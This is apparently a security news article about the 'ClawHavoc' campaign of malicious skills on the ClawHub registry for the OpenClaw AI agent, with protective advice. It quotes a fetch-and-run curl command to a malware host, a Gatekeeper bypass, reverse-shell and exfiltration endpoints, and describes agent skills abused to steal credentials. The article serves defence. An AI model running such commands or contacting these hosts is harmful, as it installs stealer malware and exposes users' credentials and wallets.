OpenClaw ClawHub Security Alert: Hundreds of Malicious Skills Found
๐ More on this topic: OpenClaw Security Guide ยท OpenClaw Plugins & Skills Guide ยท Best Models for OpenClaw ยท OpenClaw Setup Guide
Last updated: February 5, 2026. This is a developing story. We’ll update as new information emerges.
On February 1, 2026, security firm Koi Security published findings from an audit of the entire ClawHub skill registry. What they found was worse than anyone expected: 341 malicious skills out of 2,857 analyzed. Nearly 12% of everything on ClawHub was actively trying to steal your data.
This wasn’t a handful of sketchy uploads. It was a coordinated campaign โ 335 malicious skills from a single operation, deploying commodity malware through social engineering disguised as installation instructions. VirusTotal independently confirmed the findings, analyzing over 3,000 skills and flagging hundreds with malicious characteristics.
If you’ve installed any community skill from ClawHub, you need to audit your setup right now. Here’s what happened, how the attacks work, and how to protect yourself.
What Happened
The ClawHavoc Campaign
Security researcher Oren Yomtov at Koi Security discovered the campaign while building an OpenClaw bot named “Alex” for security research. Alex flagged concerns about the 2,800+ unvetted skills on ClawHub, which prompted Yomtov to audit the entire registry.
The numbers:
| Stat | Value |
|---|---|
| Total skills audited | 2,857 |
| Malicious skills found | 341 (11.9%) |
| Skills in main campaign (ClawHavoc) | 335 |
| Outlier malicious skills | 6 (different techniques) |
| Single attacker account (hightower6eu) | 314 skills, ~7,000 downloads |
| Publication timeline | ~400 skills in 7 days (Jan 27 - Feb 2, 2026) |
One attacker published 314 poisoned skills in a week and racked up 7,000 downloads before anyone noticed.
What the Malicious Skills Look Like
The fake skills are categorized across popular tool types to maximize appeal:
| Category | Count | Examples |
|---|---|---|
| Crypto tools | 111 | Solana wallets, Phantom utilities, wallet trackers |
| YouTube utilities | 57 | Video summarizers, thumbnail grabbers |
| Finance & social | 51 | Yahoo Finance tools, X/Twitter trend trackers |
| Polymarket bots | 34 | polymarket-trader, polymarket-pro, polytrading |
| ClawHub typosquats | 29 | clawhub, clawhub1, clawhubb, clawhubcli, clawwhub |
| Auto-updaters | 28 | update, updater, variants |
| Google Workspace | 17 | Gmail, Calendar, Sheets, Drive integrations |
| Ethereum gas trackers | 15 | Gas price monitors |
The crypto category dominates because cryptocurrency users tend to have valuable wallet credentials on their machines โ exactly what the malware targets.
How the Attacks Work
The Social Engineering Trick
The core technique is devastatingly simple. You install what looks like a legitimate skill โ say, solana-wallet-tracker. The SKILL.md file looks professional. The description is well-written. But hidden in the “Prerequisites” section is an instruction to install a dependency called “openclaw-agent” or “AuthTool” by running a shell command.
That shell command is the attack.
macOS Attack Chain (Primary Target)
Most OpenClaw users run on Mac Minis โ Apple Silicon is popular for headless agent setups. The attackers know this.
- The “prerequisite” directs you to run a command hosted on glot.io (a code-sharing platform)
- The glot.io script contains a base64-encoded payload
- Decoded, it runs:
curl -fsSL http://91.92.242.30/[obfuscated-path] - This fetches Atomic macOS Stealer (AMOS) โ a 521KB universal Mach-O binary (x86_64 + arm64)
- The binary bypasses Gatekeeper via
xattr -c - AMOS begins harvesting your system
Windows Attack Chain
Windows users are directed to download a password-protected ZIP from GitHub repositories containing openclaw-agent.exe. The password protection prevents antivirus from scanning the archive contents before extraction. Once extracted and run, it’s a packed trojan.
What AMOS Steals
Atomic macOS Stealer is commodity malware-as-a-service that costs $500-1,000/month on criminal marketplaces. It’s not custom-built for this campaign โ it’s off-the-shelf and brutally effective:
- Keychain passwords โ every saved password on your Mac
- Cryptocurrency wallets โ 60+ wallets supported, including seed phrases
- Browser credentials โ cookies, saved passwords, autofill data
- SSH keys and shell history
- API keys and
.envfiles (including~/.clawdbot/.env) - Telegram sessions
- Git credentials and cloud credentials
- Selective file theft via targeted directory scanning
VirusTotal confirmed the AMOS binary was detected by 16 out of ~70 security engines. That means roughly 77% of antivirus products would miss it at the time of analysis.
The Outlier Attacks (6 Skills)
Six malicious skills used different techniques outside the main ClawHavoc campaign:
Reverse shell backdoor (better-polymarket, polymarket-all-in-one): These skills actually work โ they do what they advertise. But hidden at line 180 in the code, a reverse shell opens a connection to 54.91.154.110:13338, giving the attacker full remote control of your machine. This is the most dangerous variant because the skill appears functional during testing.
Credential exfiltration (rankaj): Directly exfiltrates ~/.clawdbot/.env credentials to a webhook.site endpoint. Simple, effective, and hard to detect because webhook.site is a legitimate testing service.
The Name Change Problem
OpenClaw has been rebranded twice in under a year:
| Name | Period | Why |
|---|---|---|
| ClawdBot | Original (2025) | Created by Peter Steinberger |
| Moltbot | Mid-2025 | Rebranded after Anthropic requested the name change |
| OpenClaw | January 2026 | Current name |
This creates real security problems:
- Credential paths still reference old names โ
~/.clawdbot/.envis still where credentials live, even though the tool is now called OpenClaw - Users can’t tell what’s official โ is it
openclaw-agent,moltbot-cli, orclawdbot-tools? The name confusion makes typosquatting trivially effective - A counterfeit “Moltbot” extension was distributed via the VS Code Marketplace, impersonating the legitimate tool during the transition period
The 29 ClawHub typosquats (clawhub, clawhub1, clawhubb, clawhubcli, clawwhub, cllawhub) exploit exactly this confusion.
Why ClawHub’s Moderation Failed
We predicted this. The ClawHub marketplace has four safeguards, all of them inadequate:
| Safeguard | Reality |
|---|---|
| Publishers need a 1-week-old GitHub account | Attackers pre-create accounts. Trivial to bypass. |
| Community reporting auto-hides after 3 reports | Reactive, not preventive. The damage is done before reports accumulate. |
| 20 active reports per user limit | Limits vigilant security researchers more than attackers. |
| Download counts visible | The hightower6eu account inflated counts to ~7,000 across 314 skills. |
There is no code review process. No automated scanning. No sandboxed testing. No cryptographic signing of skills. ClawHub’s own maintainer has acknowledged the “registry cannot be secured” in its current form.
OpenClaw creator Peter Steinberger acknowledged on X that manual review of submissions is infeasible. The current response: rely on community reporting. That’s like relying on store customers to catch shoplifters after they’ve left the building.
As of February 5, most malicious skills from the ClawHavoc campaign have been reported and hidden, but the C2 infrastructure at 91.92.242.30 was still operational when researchers last checked.
How to Protect Yourself Right Now
If You’ve Installed Community Skills
Step 1: Check what’s installed.
ls -la ~/.openclaw/skills/
ls -la <your-workspace>/skills/
List every non-bundled skill. If you don’t remember installing it or can’t verify its source, remove it.
Step 2: Scan with Clawdex.
Koi Security released a free scanning tool:
# Visit clawdex.koi.security for the scanner
# It checks installed skills against known malicious signatures
Step 3: Check for AMOS infection.
If you’ve run any “prerequisite” shell commands from a skill’s documentation:
- Check Activity Monitor for unknown processes
- Look for outbound connections to
91.92.242.30,54.91.154.110, or unfamiliar IPs - Check
~/.clawdbot/.envโ if your API keys are there, rotate them immediately - Rotate all passwords stored in your macOS Keychain
- Move cryptocurrency to a new wallet generated on a clean machine
- Check browser saved passwords โ assume they’re compromised
Step 4: Check for reverse shells.
# Look for suspicious outbound connections
lsof -i -P | grep ESTABLISHED
netstat -an | grep 13338
If you see connections to IPs you don’t recognize, especially on port 13338, you have a reverse shell active.
If You Haven’t Been Compromised (Prevention)
1. Don’t install community skills. The bundled skills cover email, calendar, GitHub, browser, files, and shell. That’s enough for most use cases. Every community skill is attack surface.
2. If you must install a community skill, read the SKILL.md first. Look for:
- Shell commands in “prerequisites” โ this is the #1 red flag
curlorwgetcommands pointing to unfamiliar domains- Base64-encoded strings
- Instructions to download and execute external binaries
- References to
glot.io, GitHub releases from unknown accounts, or direct IP addresses
3. Never run prerequisite shell commands without verifying them independently. No legitimate skill requires you to curl a binary from an IP address.
4. Sandbox your OpenClaw install. Run it on dedicated hardware or a VM with throwaway accounts. Don’t connect it to your primary email, financial accounts, or machines with cryptocurrency wallets. Our security guide covers sandboxing in detail.
5. Disable skills you don’t use. Every enabled skill is attack surface โ even the bundled ones. If you don’t need exec (shell commands) or agent-browser (web automation), turn them off.
6. Monitor outbound network connections. Your agent shouldn’t be connecting to random IPs. Set up basic network monitoring or firewall rules to alert on unexpected outbound traffic.
7. Pin skill versions. Don’t auto-update. Check changelogs before updating. The update and updater typosquat skills specifically target people who blindly update.
Red Flags to Watch For
| Red Flag | Why It’s Dangerous |
|---|---|
| Skill requires shell commands as “prerequisites” | This is the primary ClawHavoc attack vector |
| Base64-encoded content in SKILL.md | Obfuscation hiding malicious payloads |
| Skill from a newly created account | Low-cost accounts are the norm for attackers |
| Crypto, finance, or trading tools | 111/341 malicious skills masqueraded as crypto tools |
| Typosquats of popular skill names | clawhub1, clawhubb, updater โ all malicious |
| Skill requests excessive permissions | A note-taking skill shouldn’t need shell access |
| Instructions to download external binaries | Legitimate skills are self-contained SKILL.md files |
| Sudden updates with no changelog | Could inject malicious code into previously clean skills |
| Skills that “work” but seem too full-featured | The reverse shell backdoors were hidden in functional code |
The Bigger Picture
This is exactly what happens when you combine:
- A zero-moderation marketplace (ClawHub)
- An agent with broad system access (OpenClaw)
- A fast-growing user base that trusts community tools (145K+ GitHub stars)
- A platform where skills are just markdown files that can instruct the agent to do anything
We warned about this in our OpenClaw Security Guide and Plugins & Skills Guide. The 26% vulnerability rate across 31,000 agent skills that researchers found earlier wasn’t a ceiling โ it was a floor. ClawHub hit 12% outright malicious (not just vulnerable), and that’s only what one audit caught.
The ClawHavoc campaign didn’t require any technical exploits. No zero-days. No code execution vulnerabilities. As security researcher Paul McCarty put it: this is “a supply chain attack… relying on social engineering and the lack of security review in the skills publication process.”
The attacker published 400+ poisoned skills in 7 days using a single account on a platform that requires only a week-old GitHub account to publish. The response from ClawHub was community reporting โ a reactive measure that only works after users have already been compromised.
What Needs to Change
For ClawHub to be safe, it would need at minimum:
- Automated malware scanning on skill submission (VirusTotal integration, static analysis)
- Sandboxed skill testing before publication
- Cryptographic signing of skill packages
- Publisher verification beyond a week-old GitHub account
- Mandatory permission declarations that are enforced, not advisory
None of these exist today. Until they do, treat every community skill as untrusted code โ because statistically, one in eight of them is trying to steal your data.
What to Do Next
- Audit your installed skills now. Remove anything you can’t verify.
- Rotate credentials if you’ve run any prerequisite commands from community skills.
- Read our full security guide for hardening your OpenClaw setup.
- Stick to bundled skills. They’re maintained by the core team and cover most use cases.
- Build your own if you need custom functionality โ it takes 10 minutes.
The OpenClaw ecosystem is powerful and genuinely useful. But right now, ClawHub is a minefield. One in eight skills is actively malicious. Protect yourself accordingly.